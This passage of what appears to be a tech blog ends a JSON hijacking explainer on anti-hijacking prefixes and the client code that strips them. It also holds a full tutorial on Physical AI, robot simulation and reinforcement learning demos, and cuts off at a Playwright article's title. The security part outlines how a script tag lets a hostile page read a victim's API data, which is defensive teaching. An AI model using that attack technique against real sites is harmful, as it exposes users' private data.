<p><strong>In short:</strong> the attacker does not need to steal the cookie. They only need the victim's browser to <em>call the API itself</em> and <em>hand over</em> the data.</p>
</blockquote>
<hr>
<h3 id="3cchgooglevccnglnphngchng">3. How Google and other big players defend against it</h3>
<p>The solution is clever: <strong>make the JSON impossible to execute when it is loaded through a <code><script></code> tag</strong>, while the legitimate site can still read it normally.</p>
<h4 id="googlechnktrcvou">Google: prepend junk characters</h4>
<p>Google adds the string <code>)]}'\n</code> before the JSON:</p>
<pre><code>)]}'\n
[{"id": 1, "email": "alice@gmail.com"}, ...]
</code></pre>
<p><strong>Why does it work?</strong></p>
<p>When the attacker loads this URL through a <code><script></code> tag, the browser tries to parse <code>)]}'\n</code> as JavaScript and immediately throws a <code>SyntaxError</code>. A script that fails to parse is not executed at all, so the data after the prefix is never evaluated.</p>
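<p>You can observe this in Node.js or a browser console without any network request. The hypothetical helper below compiles the response body with the <code>Function</code> constructor, which parses the text as a function body without running it. For this purpose that behaves like loading it as a script: the prefixed payload fails to parse, while the bare JSON array is valid JavaScript.</p>
<pre><code class="language-javascript">// Does `source` parse as JavaScript? new Function compiles but never runs it.
function isParsableScript(source) {
  try {
    new Function(source);
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

const json = '[{"id":1,"email":"alice@gmail.com"}]';
console.log(isParsableScript(json));            // true: a bare JSON array is valid JS
console.log(isParsableScript(")]}'\n" + json)); // false: the prefix breaks parsing
</code></pre>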
<p><strong>How does the legitimate site read it?</strong></p>
<pre><code class="language-javascript">// What the Google client does (illustrative URL)
const response = await fetch("https://mail.google.com/mail/feed/atom");
const rawText = await response.text();

// Strip the junk prefix (only if the body starts with it) before parsing
const prefix = ")]}'\n";
const cleanJson = rawText.startsWith(prefix) ? rawText.slice(prefix.length) : rawText;
const data = JSON.parse(cleanJson);
</code></pre>
<p>Example log output:</p>
<pre><code>rawText: )]}'\n[{"id":1,"email":"alice@gmail.com"}]
cleanJson: [{"id":1,"email":"alice@gmail.com"}]
data: Array(1) [ { id: 1, email: "alice@gmail.com" } ]
</code></pre>
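<p>The same idea can be sketched from the server's side as well. Below is a minimal Python sketch with hypothetical helper names (<code>render_protected_json</code>, <code>parse_protected_json</code>); it is not Google's actual code. The server prepends the prefix, and the trusted client strips it only when it sits at the very start of the body, rejecting any response that lacks it instead of parsing it as-is.</p>
<pre><code class="language-python">import json

# Google-style anti-hijacking prefix: ")]}'" followed by a newline
XSSI_PREFIX = ")]}'\n"


def render_protected_json(payload) -> str:
    """Server side: serialize the payload and prepend the prefix."""
    return XSSI_PREFIX + json.dumps(payload)


def parse_protected_json(text: str):
    """Trusted client side: strip the prefix, then parse the JSON.

    Fails closed: a body without the expected prefix is rejected
    instead of being parsed as-is.
    """
    if not text.startswith(XSSI_PREFIX):
        raise ValueError("response is missing the anti-hijacking prefix")
    return json.loads(text[len(XSSI_PREFIX):])


if __name__ == "__main__":
    body = render_protected_json([{"id": 1, "email": "alice@gmail.com"}])
    print(body.splitlines()[0])        # the junk line a script tag would choke on
    print(parse_protected_json(body))  # the original list, round-tripped
</code></pre>
<p>Failing closed is a deliberate choice: if an endpoint ever ships without the prefix, the client notices immediately instead of silently accepting an unprotected response.</p>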
<hr>
<h4 id="messengercanvavnglpvtn">Messenger / Canva: the infinite loop</h4>
<p>Facebook Messenger and Canva take a different approach: they prepend <code>for(;;);</code> or <code>while(true);</code> to the JSON.</p>
<pre><code>for(;;);
{"t":"msg","payload":{"thread_id":"...","message":"..."}}
</code></pre>
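<p><strong>Why does this work?</strong></p>
<p>When the attacker loads the response through a <code><script></code> tag, the browser executes <code>for(;;);</code>, a loop that never terminates. The tab running the attacker's page <strong>freezes completely</strong> and never reaches the data that follows. (Strictly speaking, a bare top-level object like the one above would already fail to parse as a script; the loop is what stops payloads that are valid JavaScript, such as arrays.)</p>
<p><strong>How does the legitimate site read it?</strong></p>
<pre><code class="language-javascript">const PREFIX = "for(;;);";
const response = await fetch("https://www.messenger.com/api/...");
const rawText = await response.text();

// Strip the leading "for(;;);", but only when it sits at the very start
const cleanJson = rawText.startsWith(PREFIX) ? rawText.slice(PREFIX.length) : rawText;
const data = JSON.parse(cleanJson);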
</code></pre>
<p>Example log output:</p>
<pre><code>rawText: for(;;);{"t":"msg","payload":{"thread_id":"xyz"}}
cleanJson: {"t":"msg","payload":{"thread_id":"xyz"}}
data: { t: "msg", payload: { thread_id: "xyz" } }
</code></pre>
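<p>Since both conventions look the same to the trusted client (strip a fixed string from the start, then parse), one helper can handle either. A minimal Python sketch, assuming a hypothetical <code>KNOWN_PREFIXES</code> tuple that you would adapt to the APIs you actually call:</p>
<pre><code class="language-python">import json

# Hypothetical set of anti-hijacking prefixes this client accepts
KNOWN_PREFIXES = (")]}'\n", "for(;;);", "while(true);")


def strip_and_parse(text: str):
    """Remove one known prefix from the start of the body and parse the rest.

    Raises ValueError if no known prefix is present, so an unprotected
    response is never silently accepted.
    """
    for prefix in KNOWN_PREFIXES:
        if text.startswith(prefix):
            return json.loads(text[len(prefix):])
    raise ValueError("unknown or missing anti-hijacking prefix")


if __name__ == "__main__":
    print(strip_and_parse('for(;;);{"t":"msg","payload":{"thread_id":"xyz"}}'))
    print(strip_and_parse(")]}'\n" + '[{"id":1}]'))
</code></pre>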
<hr>
<h3 id="4sosnhhaikthut">4. Comparing the two techniques</h3>
<table>
<thead>
<tr>
<th>Criterion</th>
<th>Google (junk prefix)</th>
<th>Messenger/Canva (infinite loop)</th>
</tr>
</thead>
<tbody>
<tr>
<td>How execution stops</td>
<td>Syntax error</td>
<td>Loop hangs the tab</td>
</tr>
<tr>
<td>Takes effect</td>
<td>Immediately</td>
<td>Immediately</td>
</tr>
<tr>
<td>Effect on the attacker</td>
<td>Script stops</td>
<td>Tab freezes/crashes</td>
</tr>
<tr>
<td>How "annoying" it is for the attacker</td>
<td>Moderate</td>
<td>Higher</td>
</tr>
</tbody>
</table>
<hr>
<h3 id="5tisaovndngdtrnhduytvli">5. Why keep these prefixes when browsers have already been patched?</h3>
<p>Modern browsers (Chrome, Safari, Edge) <strong>patched the <code>Array</code> constructor override vulnerability</strong> more than 10 years ago. So why do Google and Messenger still keep these snippets?</p>
<p>The answer lies in the principle of <strong>Defense in Depth (layered security)</strong>.</p>
<blockquote>
<p>Never place all of your trust in a single layer of protection.</p>
</blockquote>
<p>There are three practical reasons:</p>
<p><strong>Reason 1: Some users still run outdated browsers</strong></p>
<p>Smart TVs, IoT devices, and old browsers in emerging markets often run Chrome/WebKit builds that are rarely or never updated, so a server cannot assume that every client has every browser fix.</p>
<p><strong>Reason 2: Protection against zero-days</strong></p>
<p>A new zero-day vulnerability in a browser could revive a similar attack. The prefix technique is a layer of defense that works <em>independently</em> of the browser.</p>
<p><strong>Reason 3: Almost zero cost to maintain</strong></p>
<p>Adding a few bytes to the start of each response and a line of string handling on the client has no noticeable performance impact. With a cost that close to zero, there is little reason to remove it.</p>
<hr>
<h2 id="tngkt">Summary</h2>
<p>JSON Hijacking is an interesting example of how one browser behavior (a <code><script></code> tag is always allowed to load resources cross-origin) can be abused to break the usual security model.</p>
<p>The seemingly "junk" characters at the start of Google's JSON are actually a subtle defensive technique:</p>
<ul>
<li><strong>Attack via <code><script></code>:</strong> blocked immediately by a syntax error or an infinite loop.</li>
<li><strong>Legitimate access via the Fetch API:</strong> works normally once the prefix is stripped.</li>
<li><strong>Defense in Depth:</strong> protecting users does not depend entirely on the browser.</li>
</ul>
<p>Next time you see <code>for(;;);</code> or <code>)]}'\n</code> in an API response, remember that it is not a bug: it is a carefully designed layer of armor.</p>
<hr>
<h2 id="tiliuthamkho">References</h2>
<ul>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/AJAX_Security_Cheat_Sheet.html">OWASP AJAX Security Cheat Sheet — Protect Against JSON Hijacking</a></li>
<li><a href="https://portswigger.net/research/json-hijacking-for-the-modern-web">PortSwigger Research: JSON Hijacking for the Modern Web</a></li>
<li><a href="https://haacked.com/archive/2009/06/25/json-hijacking.aspx/">Phil Haack: JSON Hijacking (a classic write-up of the Array constructor vulnerability)</a></li>
<li><a href="https://docs.gitlab.com/user/application_security/api_security_testing/checks/json_hijacking_check/">GitLab Docs: JSON Hijacking Check (definition and remediation)</a></li>
<li><a href="https://dev.to/antogarand/why-facebooks-api-starts-with-a-for-loop-1eob">Dev.to: Why Facebook's API starts with a for loop</a></li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>Exploring Physical AI & Robotics</h1>
<p>L.M.T — Mon, 22 Jun 2026 09:16:34 GMT</p>
<!--kg-card-begin: markdown--><h2 id="mclc">Table of Contents</h2>
<ol>
<li><a href="#physicalailg">What is Physical AI?</a></li>
<li><a href="#bntrongmtrobotcg">What is inside a robot?</a></li>
<li><a href="#tisaocnsimulation">Why do we need simulation?</a></li>
<li><a href="#neuralnetworklmgtrongrobot">What does a neural network do in a robot?</a></li>
<li><a href="#simtorealvccmhnhaihini">Sim-to-Real and modern AI models</a></li>
<li><a href="#thchnhchymtsdemocbn">Hands-on: running a few basic demos</a></li>
<li><a href="#ktlun">Conclusion</a></li>
</ol>
<hr>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="physicalailg">What is Physical AI?</h2>
<p>Physical AI refers to AI systems that can understand and interact with the physical world. Unlike traditional AI, which only processes text or images, Physical AI has to:</p>
<ul>
<li><strong>Understand physics</strong>: gravity pulls objects down, friction keeps them from sliding, and lifting a cup takes a certain amount of force.</li>
<li><strong>Act in 3D space</strong>: move, grasp, push, and rotate objects.</li>
<li><strong>React in real time</strong>: process sensor data and make decisions within milliseconds.</li>
<li><strong>Tolerate errors</strong>: the real world is never as clean as a simulation.</li>
</ul>
<p>The biggest difference? When an LLM gives a wrong answer, you just ask again. When a robot takes a wrong action, it can break a cup, spill coffee, or worse, endanger the people around it.</p>
<h2 id="bntrongmtrobotcg">What is inside a robot?</h2>
<p>At its core, a robot has three main components:</p>
<p><strong>1. Sensors</strong>: the robot's "senses". Encoders measure joint angles, gyroscopes measure angular velocity, force sensors measure contact forces, and cameras provide images. For example, the touch-sensing Shadow Dexterous Hand model in Gymnasium-Robotics has 92 touch sensors spread across the palm and finger segments.</p>
<p><strong>2. Brain</strong>: a neural network that takes sensor data and decides the next action. This is the "AI" part of the robot.</p>
<p><strong>3. Actuators</strong>: the robot's "muscles". Motors receive control signals and produce motion.</p>
<p>An important concept is <strong>Degrees of Freedom (DOF)</strong>: the number of independent motions a robot can make. A human arm has 7 DOF, and a human hand has roughly 21-27 DOF depending on how you count. The Shadow Dexterous Hand mimics the human hand with 24 DOF. The higher the DOF, the more dexterous the robot, but the harder the control problem.</p>
<h2 id="tisaocnsimulation">Why do we need simulation?</h2>
<p>You cannot teach a robot by letting it learn through trial and error on real hardware. An industrial robot costs $50k-$500k, and every failed attempt can damage the hardware or put people at risk. On top of that, an agent needs millions of attempts to learn.</p>
<p>The solution is <strong>simulation</strong>: modeling the whole robot and its physical environment on a computer. <strong>MuJoCo</strong> (Multi-Joint dynamics with Contact) is one of the most widely used physics engines in robotics research; DeepMind acquired it in 2021 and open-sourced it under Apache 2.0 in 2022.</p>
<p>Benefits of simulation:</p>
<ul>
<li><strong>Cheap</strong>: computers run 24/7 with no hardware wear.</li>
<li><strong>Fast</strong>: one day of simulation can add up to years of real-world experience.</li>
<li><strong>Safe</strong>: if the robot "dies", you just reset it.</li>
<li><strong>Parallel</strong>: run 1,000 instances at once on a cluster.</li>
</ul>
<h2 id="neuralnetworklmgtrongrobot">What does a neural network do in a robot?</h2>
<p>The core problem: in the Shadow Hand environment below, the robot receives 153 numbers from its sensors and must output 20 numbers to drive its motors. What function maps an observation to an action? That is the job of the <strong>neural network</strong>.</p>
<p>Example with the Shadow Hand environment:</p>
<pre><code class="language-python">import gymnasium as gym
import gymnasium_robotics

gymnasium_robotics.register_robotics_envs()
env = gym.make("HandManipulateBlock_ContinuousTouchSensors-v1")
obs, _ = env.reset()

print(obs["observation"].shape)   # (153,)  ← 61 hand/object state + 92 touch
print(env.action_space.shape)     # (20,)   ← 20 motor commands
</code></pre>
<p>In the <strong>SAC (Soft Actor-Critic)</strong> algorithm:</p>
<ul>
<li><strong>Actor network</strong>: takes an observation and returns an action (sampled from a learned probability distribution); this is the robot's "output".</li>
<li><strong>Critic network</strong>: estimates how good an action is in the current state (its Q-value), which tells the actor how to improve.</li>
</ul>
<p>Training repeats this cycle many thousands of times: observe → pick an action → receive a reward → update the weights. Once training is done, only the actor network is needed to control the robot, with inference taking around 0.5 ms.</p>
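<p>The observe → act → reward → update cycle can be illustrated without MuJoCo at all. The sketch below is a deliberately simplified stand-in, <em>not</em> SAC: a hypothetical 1-D "reach" task where a one-parameter policy (a gain <code>k</code>) is improved by plain random search, keeping a perturbed gain only if it earns a higher total reward. SAC replaces this crude update with gradient steps on the actor and critic networks, but the loop has the same shape.</p>
<pre><code class="language-python">import random

TARGET = 1.0       # hypothetical goal position (1-D stand-in for the red point)
STEP_SIZE = 0.1    # how far one full-strength action moves the "gripper"
EPISODE_LEN = 50   # steps per episode, as in the FetchReach logs


def run_episode(gain: float) -> float:
    """One episode of observe -> act -> reward; returns the total reward."""
    pos, total = 0.0, 0.0
    for _ in range(EPISODE_LEN):
        error = TARGET - pos                          # observe
        action = max(-1.0, min(1.0, gain * error))    # act (clipped to [-1, 1])
        pos += STEP_SIZE * action                     # environment moves
        total += -abs(TARGET - pos)                   # reward: minus the distance
    return total


def train(iterations: int = 200, seed: int = 0) -> float:
    """'Update the weights' by random search: keep a perturbed gain only if it scores better."""
    rng = random.Random(seed)
    gain, best = 0.0, run_episode(0.0)
    for _ in range(iterations):
        candidate = gain + rng.gauss(0.0, 0.5)
        score = run_episode(candidate)
        if score > best:
            gain, best = candidate, score
    return gain


if __name__ == "__main__":
    trained_gain = train()
    print("return before training:", run_episode(0.0))
    print("return after training: ", run_episode(trained_gain))
</code></pre>
<p>After training, only the learned parameter (here the gain, in SAC the actor network) is needed to act, which is why inference is so cheap compared with training.</p>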
<h2 id="simtorealvccmhnhaihini">Sim-to-Real and modern AI models</h2>
<h3 id="simtoreallg">What is Sim-to-Real?</h3>
<p>Robots learn very well in simulation, but out in the real world they... stumble. The reason: a simulation never matches reality exactly. Floor friction differs slightly, an object's mass is off by a few grams, motors respond more slowly, camera lighting changes. This mismatch is called the <strong>sim-to-real gap</strong>. A policy that fits the simulator too snugly fails when it meets those small discrepancies in the real world.</p>
<p><strong>Sim-to-Real</strong> is the problem of transferring a policy from simulation to a real robot so that it still works well.</p>
<h3 id="giiphpdomainrandomization">Solution: Domain Randomization</h3>
<p>The idea: instead of training in one fixed simulated world, we <strong>randomize the physical parameters</strong> (friction, mass, forces, latency, lighting) every episode. The agent is forced to learn a policy that works across <em>many</em> variations, so when it meets reality (just one more variation), it is not thrown off.</p>
<p>An intuitive example: instead of learning to drive on a single road, you practice on thousands of different roads, so you can still drive on a road you have never seen. OpenAI used this approach to solve a Rubik's Cube with a single robot hand (2019).</p>
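<p>At its core, domain randomization means "draw new physics at the start of every episode". A minimal Python sketch of that sampling step; the parameter names and ranges (<code>friction</code>, <code>mass_kg</code>, <code>latency_steps</code>) are illustrative assumptions, not values from OpenAI's setup or from MuJoCo.</p>
<pre><code class="language-python">import random
from dataclasses import dataclass

# Illustrative ranges only (assumptions); real projects tune these per robot.
FRICTION_RANGE = (0.5, 1.5)   # multiplier on the nominal friction
MASS_RANGE_KG = (0.08, 0.12)  # mass of the manipulated object
MAX_LATENCY_STEPS = 3         # extra control delay, in simulation steps


@dataclass
class PhysicsParams:
    friction: float
    mass_kg: float
    latency_steps: int


def sample_physics(rng: random.Random) -> PhysicsParams:
    """Draw a new variant of the simulated world; call once per episode."""
    return PhysicsParams(
        friction=rng.uniform(*FRICTION_RANGE),
        mass_kg=rng.uniform(*MASS_RANGE_KG),
        latency_steps=rng.randint(0, MAX_LATENCY_STEPS),
    )


if __name__ == "__main__":
    rng = random.Random(42)
    for episode in range(3):
        params = sample_physics(rng)
        # A real setup would write these values into the simulator's model
        # before env.reset(), then run and train on the episode as usual.
        print(f"episode {episode}: {params}")
</code></pre>
<p>Because the policy never sees the same world twice, it cannot overfit to one exact friction or mass value, which is the whole point of the technique.</p>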
<h3 id="ccmhnhaihini">Modern AI models</h3>
<p>Directions that extend what Physical AI can do:</p>
<table>
<thead>
<tr>
<th>Direction</th>
<th>Idea</th>
<th>Examples</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>VLA (Vision-Language-Action)</strong></td>
<td>Combine camera, language, and action in a single model</td>
<td>π0, RT-2, NVIDIA GR00T</td>
</tr>
<tr>
<td><strong>Diffusion Policy</strong></td>
<td>Generate a whole trajectory (a sequence of actions) instead of a single action</td>
<td>The paper reports an average improvement of 46.9% over the baselines it was compared against, across 15 benchmark tasks</td>
</tr>
<tr>
<td><strong>World Models</strong></td>
<td>Predict the future as video so the robot can "think" before acting</td>
<td>NVIDIA Cosmos</td>
</tr>
</tbody>
</table>
<p>These approaches still build on the same foundation as this demo, <strong>RL + Simulation</strong>, often combined with imitation learning from demonstration data; they differ mainly in scale, data, and architecture.</p>
<hr>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="thchnhchymtsdemocbn">Hands-on: running a few basic demos</h2>
<p>This section walks through a few demos so you can watch a robot learn in simulation.</p>
<h3 id="yucuhthng">System requirements</h3>
<table>
<thead>
<tr>
<th>Item</th>
<th>Requirement</th>
</tr>
</thead>
<tbody>
<tr>
<td>Python</td>
<td>3.10+</td>
</tr>
<tr>
<td>OS</td>
<td>macOS / Linux (on Windows, use WSL2)</td>
</tr>
<tr>
<td>Disk</td>
<td>~2GB</td>
</tr>
<tr>
<td>GPU</td>
<td>Not required (MuJoCo is CPU-bound)</td>
</tr>
</tbody>
</table>
<h3 id="setupnhanh1ln">Quick setup (one time)</h3>
<pre><code class="language-bash"># 1. Clone repo
git clone https://github.com/gmo-vietnamlab/lmt-physical-ai-001.git
cd lmt-physical-ai-001

# 2. Virtual env
python -m venv rl-env
source rl-env/bin/activate

# 3. Install
pip install "gymnasium-robotics[mujoco]" "stable-baselines3[extra]"
</code></pre>
<blockquote>
<p>⚠️ <strong>Note</strong>: if you run headless (a server without a GUI), change <code>render_mode="human"</code> to <code>render_mode="rgb_array"</code> in the demo code.</p>
</blockquote>
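<p>Before running the demos, it can help to confirm that the packages installed above are importable from the active <code>rl-env</code> environment. A minimal sketch using only the Python standard library; the module names (<code>gymnasium</code>, <code>gymnasium_robotics</code>, <code>mujoco</code>, <code>stable_baselines3</code>) are the import names these pip packages normally provide.</p>
<pre><code class="language-python">import importlib.util
import sys

# Import names of the packages installed by the pip command above
REQUIRED = ["gymnasium", "gymnasium_robotics", "mujoco", "stable_baselines3"]


def check_packages(names=REQUIRED) -> dict:
    """Map each module name to True/False without actually importing it."""
    return {name: importlib.util.find_spec(name) is not None for name in names}


if __name__ == "__main__":
    print("Python", sys.version.split()[0])
    status = check_packages()
    for name, ok in status.items():
        print(f"{name:20s} {'OK' if ok else 'MISSING'}")
    if not all(status.values()):
        print("Some packages are missing: re-run the pip install step inside rl-env.")
</code></pre>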
<h3 id="demo1fetchreachd2pht">Demo 1: FetchReach (easy, ~2 minutes)</h3>
<p>The Fetch robot moves its gripper to a target point in 3D. It is a good baseline for seeing RL work right away.</p>
<pre><code class="language-bash"># Step 1: train
python demos/fetch_reach.py
# → choose Option 1: Train FetchReach
# ============================================================
# DEMO 1: FetchReach (easy - solves 100%)
# ============================================================
# Task: move the gripper to the target point (red)
# Action: 4 dims (dx, dy, dz, gripper)
# Observation: 10 dims (gripper position + velocity)

# Training 20k steps...
# Done in 101s

# Result: success=100%, avg_reward=-1.1
# -> The agent learned to move the gripper to the target!

# Model saved: saved_models/fetch_reach_sac.zip

</code></pre>
<p><strong>Expected result</strong>: a 100% success rate after about 20,000 steps. You will see the robot go from "flailing around" (random) to "moving precisely to the red point".</p>
<pre><code class="language-bash"># Step 2: watch the robot (after training finishes)
python demos/fetch_reach.py
# → choose Option 2: Render FetchReach (3D view)
# Render: FetchReachDense-v4
# Close the MuJoCo window to stop.

#   Episode 1: OK reward=-0.5 (50 steps)
#   Episode 2: OK reward=-1.5 (50 steps)
#   Episode 3: OK reward=-1.9 (50 steps)
#   Episode 4: OK reward=-0.7 (50 steps)
#   Episode 5: OK reward=-1.6 (50 steps)
</code></pre>
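<p>The success rate and per-episode rewards above come from how Fetch tasks score each step. According to the Gymnasium-Robotics documentation, a Fetch goal counts as reached when the gripper is within a distance threshold of the target (0.05 m by default); the sparse version (<code>FetchReach</code>) returns -1 per step until then and 0 afterwards, while the dense version (<code>FetchReachDense</code>, used in the render step) returns the negative distance. The sketch below re-implements that scoring in plain Python for illustration; it is not the library's own code.</p>
<pre><code class="language-python">import math

DISTANCE_THRESHOLD = 0.05  # metres; Fetch default per the Gymnasium-Robotics docs


def goal_distance(achieved, desired) -> float:
    """Euclidean distance between the gripper position and the target (x, y, z)."""
    return math.dist(achieved, desired)


def sparse_reward(achieved, desired) -> float:
    """FetchReach: -1 while the target is not reached, 0 once within the threshold."""
    return -1.0 if goal_distance(achieved, desired) > DISTANCE_THRESHOLD else 0.0


def dense_reward(achieved, desired) -> float:
    """FetchReachDense: minus the distance, so closer means a reward nearer 0."""
    return -goal_distance(achieved, desired)


def is_success(achieved, desired) -> bool:
    """The goal counts as reached when the distance is under the threshold."""
    return DISTANCE_THRESHOLD > goal_distance(achieved, desired)


if __name__ == "__main__":
    target = (1.30, 0.75, 0.53)    # hypothetical goal position
    gripper = (1.30, 0.75, 0.60)   # 7 cm above it
    print(sparse_reward(gripper, target), dense_reward(gripper, target), is_success(gripper, target))
</code></pre>
<p>This also explains why the dense rewards in the render log are small negative numbers: each of the 50 steps adds minus a (small) distance, so a well-trained agent keeps the episode total close to 0.</p>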
<p>This is the standard flow of an RL project: <strong>Train → Save → Load → Inference</strong>.</p>
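<p>In Stable-Baselines3 this flow corresponds to <code>model.learn()</code>, <code>model.save()</code>, <code>SAC.load()</code> and <code>model.predict()</code>. The dependency-free sketch below only mirrors the shape of that flow with a hypothetical linear policy stored as JSON; the file name and parameter layout are illustrative and are not the format SB3 uses (SB3 writes a <code>.zip</code> archive such as <code>saved_models/fetch_reach_sac.zip</code>).</p>
<pre><code class="language-python">import json
import os
import tempfile


def save_policy(params: dict, path: str) -> None:
    """Save: persist the trained parameters so training does not have to be rerun."""
    with open(path, "w", encoding="utf-8") as f:
        json.dump(params, f)


def load_policy(path: str) -> dict:
    """Load: restore the parameters in a fresh process (e.g. the render step)."""
    with open(path, encoding="utf-8") as f:
        return json.load(f)


def predict(params: dict, observation: list) -> float:
    """Inference: a hypothetical linear policy, action = w . obs + b."""
    return sum(w * x for w, x in zip(params["weights"], observation)) + params["bias"]


if __name__ == "__main__":
    trained = {"weights": [0.5, -0.25], "bias": 0.1}   # stand-in for "Train"
    path = os.path.join(tempfile.gettempdir(), "toy_policy.json")
    save_policy(trained, path)
    restored = load_policy(path)
    print(predict(restored, [1.0, 2.0]))
</code></pre>
<p>Separating training from inference this way is what lets Option 2 render the robot instantly: it only loads the saved file instead of retraining.</p>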
<h3 id="demo2shadowhandvixcgickh">Demo 2: Shadow Hand with touch sensing (hard)</h3>
<p>The most complex environment in this article: the same kind of robot hand OpenAI used to solve the Rubik's Cube.</p>
<blockquote>
<p><strong>Note</strong>: this demo <strong>only renders the 3D environment</strong> with <strong>random actions</strong> so you can get a feel for its complexity (24 DOF, 92 touch sensors); it <strong>does not train</strong> an agent to reach the goal. The hand moves randomly and will not "solve" the task, because this problem needs <strong>millions of steps</strong> plus a GPU, which is beyond the scope of a quick demo.</p>
</blockquote>
<pre><code class="language-bash">python demos/manipulate_block_touch_sensors_example.py
# Option 1: Continuous Touch Sensors
</code></pre>
<p>You will see:</p>
<ul>
<li>A MuJoCo window with a <strong>24-DOF</strong> robot hand (24 joints, 20 of them actuated).</li>
<li><strong>92 touch sensors</strong> (highlighted in color on contact).</li>
<li>A <strong>153-dimensional observation</strong> = 61 hand and object state values + 92 touch sensors.</li>
<li>A <strong>20-dimensional action</strong> = 20 motor commands (each motor drives one actuated joint).</li>
</ul>
<p><strong>Distribution of the 92 touch sensors:</strong></p>
<table>
<thead>
<tr>
<th>Region</th>
<th>Number of regions</th>
<th>Sensors per region</th>
<th>Total</th>
</tr>
</thead>
<tbody>
<tr>
<td>Proximal phalanges (4 fingers)</td>
<td>4</td>
<td>7</td>
<td>28</td>
</tr>
<tr>
<td>Middle phalanges (4 fingers)</td>
<td>4</td>
<td>5</td>
<td>20</td>
</tr>
<tr>
<td>Fingertips (4 fingers)</td>
<td>4</td>
<td>5</td>
<td>20</td>
</tr>
<tr>
<td>Thumb (3 segments)</td>
<td>3</td>
<td>5</td>
<td>15</td>
</tr>
<tr>
<td>Palm</td>
<td>1</td>
<td>9</td>
<td>9</td>
</tr>
<tr>
<td><strong>Total</strong></td>
<td></td>
<td></td>
<td><strong>92</strong></td>
</tr>
</tbody>
</table>
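<p>The table can be checked with simple arithmetic: multiply regions by sensors per region, add everything up, then add the 61 non-touch values to recover the 153-dimensional observation. A small Python sketch whose dictionary just restates the table:</p>
<pre><code class="language-python"># (number of regions, sensors per region), restated from the table above
TOUCH_LAYOUT = {
    "proximal phalanges (4 fingers)": (4, 7),
    "middle phalanges (4 fingers)": (4, 5),
    "fingertips (4 fingers)": (4, 5),
    "thumb (3 segments)": (3, 5),
    "palm": (1, 9),
}
STATE_DIMS = 61  # non-touch part of the observation


def total_touch_sensors(layout=TOUCH_LAYOUT) -> int:
    """Sum of regions x sensors-per-region over every row of the table."""
    return sum(regions * per_region for regions, per_region in layout.values())


if __name__ == "__main__":
    touch = total_touch_sensors()
    print("touch sensors:", touch)
    print("observation size:", STATE_DIMS + touch)
</code></pre>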
<p>Each sensor returns a normal-force value (a float >= 0). Solving this task takes <strong>millions of steps</strong>, which shows how hard Physical AI really is.</p>
<h3 id="bngyoptionscafetch_reachpy">Full list of options in <code>fetch_reach.py</code></h3>
<table>
<thead>
<tr>
<th>Option</th>
<th>Description</th>
<th>Time</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Train FetchReach: solves 100% (RL)</td>
<td>~2 minutes</td>
</tr>
<tr>
<td>2</td>
<td>Render the trained model (3D view)</td>
<td>Instant</td>
</tr>
<tr>
<td>3</td>
<td>Reset (delete the saved model)</td>
<td>Instant</td>
</tr>
</tbody>
</table>
<h3 id="troubleshooting">Troubleshooting</h3>
<ul>
<li><strong>Rendering needs a display</strong>: on a headless server, switch to <code>render_mode="rgb_array"</code> or drop the parameter.</li>
<li><strong>Training speed</strong>: about 175 steps/second on an M-series MacBook. A GPU does not help much because MuJoCo is CPU-bound.</li>
<li><strong>FetchSlide does not solve right away</strong>: it needs about 300k-500k steps in total (running option 2 roughly 6-10 times). This is normal.</li>
<li><strong><code>Overriding environment in registry</code> warning</strong>: safe to ignore; it does not affect the results.</li>
<li><strong>MuJoCo GUI does not appear on a Mac</strong>: try <code>mjpython demos/...</code> instead of <code>python</code>.</li>
</ul>
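<p>The step counts and speed above translate directly into wall-clock time. A back-of-the-envelope Python helper, using the roughly 175 steps/second figure from the notes above (your machine will differ):</p>
<pre><code class="language-python">STEPS_PER_SECOND = 175  # rough figure from the troubleshooting notes above


def training_minutes(total_steps: int, steps_per_second: float = STEPS_PER_SECOND) -> float:
    """Estimated wall-clock training time in minutes."""
    return total_steps / steps_per_second / 60


if __name__ == "__main__":
    for label, steps in [("FetchReach", 20_000),
                         ("FetchSlide (low)", 300_000),
                         ("FetchSlide (high)", 500_000)]:
        print(f"{label:18s} {steps:>8,} steps ~ {training_minutes(steps):5.1f} min")
</code></pre>
<p>At that rate, FetchReach's 20k steps take about 2 minutes (in line with the ~101 s run shown earlier), while FetchSlide's 300k-500k steps take roughly 29-48 minutes.</p>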
<hr>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="ktlun">Conclusion</h2>
<p>Physical AI is in a boom phase. Its foundation is still <strong>RL + Simulation</strong>, exactly what this demo shows. Modern approaches (VLA, Diffusion Policy, World Models) differ in scale, data, and architecture rather than being an entirely new paradigm.</p>
<p>In the not-too-distant future, robots are likely to appear in kitchens, factories, and hospitals, all "taught" the same way you just practiced.</p>
<hr>
<h2 id="tiliuthamkho">References</h2>
<ul>
<li><a href="https://robotics.farama.org/">Gymnasium-Robotics (Farama Foundation)</a></li>
<li><a href="https://mujoco.readthedocs.io/">MuJoCo Documentation</a></li>
<li><a href="https://stable-baselines3.readthedocs.io/">Stable-Baselines3</a></li>
<li><a href="https://openai.com/index/solving-rubiks-cube/">OpenAI - Solving Rubik's Cube with a Robot Hand</a></li>
<li><a href="https://nvidianews.nvidia.com/news/nvidia-isaac-gr00t-n1-open-humanoid-robot-foundation-model-simulation-frameworks">NVIDIA Isaac GR00T</a></li>
<li><a href="https://www.physicalintelligence.company/blog/pi0">Physical Intelligence π0</a></li>
<li><a href="https://arxiv.org/abs/2303.04137">Diffusion Policy paper</a></li>
<li><a href="https://www.nvidia.com/en-sg/ai/cosmos/">NVIDIA Cosmos World Foundation Models</a></li>
<li><a href="https://arxiv.org/abs/1801.01290">Soft Actor-Critic paper</a></li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>What is Playwright? From E2E Testing to AI Test Agents (2026)</h1>
<p>P.V.P — Thu, 18 Jun 2026 07:33:00 GMT</p>
